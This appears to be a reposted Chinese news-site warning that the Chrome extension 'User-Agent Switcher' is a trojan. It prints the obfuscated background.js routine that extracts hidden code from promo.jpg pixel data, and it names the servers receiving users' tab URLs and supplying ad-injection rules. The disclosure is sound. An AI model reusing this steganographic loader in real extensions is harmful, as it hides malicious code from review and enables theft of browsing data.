当前位置:首页 > 短网址资讯 > 正文内容

大家一定注意了 Chrome 的插件 User-Agent Switcher 是个木马!

www.ft12.com5年前 (2017-09-10)短网址资讯1758
hrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {            if ("" === '../promo.jpg') return "";            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];            if (c.data.every(function(t) {                    return 0 === t
                })) return "";
            var m, s;            if (1 === o)                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 


扫描二维码推送至手机访问。

版权声明:本文由短链接发布,如需转载请注明出处。

本文链接:https://www.ft12.com/article_469.html

分享给朋友:

相关文章

从100万个搜索中结果,得出16个SEO优化的核心影响因素

从100万个搜索中结果,得出16个SEO优化的核心影响因素

尽管这篇文章剖析的是google,可是很多关于其他查找引擎也同样受用,不得不说的是在查找技术上baidu与google的距离还是很远,可能方向都放到赚钱去了吧,OK,让咱们开端吧!咱们剖析了100万个查找成果(SERP)来回的一下这个问题:...

如何才能让网络爬虫抓取短链接?

网络爬虫(又被称爲网页蜘蛛,网络机器人),是一种依照一定的规则、自动的抓取万维网信息的顺序或许脚本。通常它爲搜索引擎从万维网上下载网页,是搜索引擎的重要组成局部。抓取战略链接的抓取战略可以分爲深度优先、广度优先和最佳优先三种。1、深度化先捜...

卡刷脸支付的时代即将取代现金和刷卡

卡刷脸支付的时代即将取代现金和刷卡

[ ft12短网址导读 ] 5月18日,一段付出宝刷脸付出的视频撒播于网络。视频中的女子在某终端上运用付出宝结账,不需求手机,也不必输入账号,仅靠刷脸和输入手机尾号即可承认。5月18日,一段支付宝刷脸付出的视频撒播于网络。视频中的...

短网址系统如何面对高并发进行优化?

短网址系统如何面对高并发进行优化?

短网址 望文生义,即是将长网址缩短到一个很短的网址,用户拜访这个短网址能够重定向到原本的长网址(复原)。这么能够到达易于回忆、变换的目的,常用于有字数约束的微博、二维码等场景。开篇先抛出几个疑问,假如咱们自个去完成会怎样完成这个看...

最久29分钟送达?又一家“智能零售”超市

最久29分钟送达?又一家“智能零售”超市

【FT12短网址】8月2日消息,亿邦动力网获悉,雅堂小超与饿了么蜂鸟配送签署战略合作。此次合作雅堂小超将推出定时精准配送等一系列重磅内容,双方将在智能零售即时配送领域展开深入合作。据相关统计数据表明,中国零售行业的总规模已达到4.5万亿美元...

无人超市火了,可无人模式却不一定适合餐饮业

[ FT12短网址 ] 一直以来,无人形式在餐饮业者“是噱头还是趋势”的争议从没连续。在不看好这一形式的业内人士看来,人的效劳是餐饮运营中的一个主要构成内容,厨师、侍者的效劳是享受美食的一部分,缺少了人的因素,美食就缺少...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。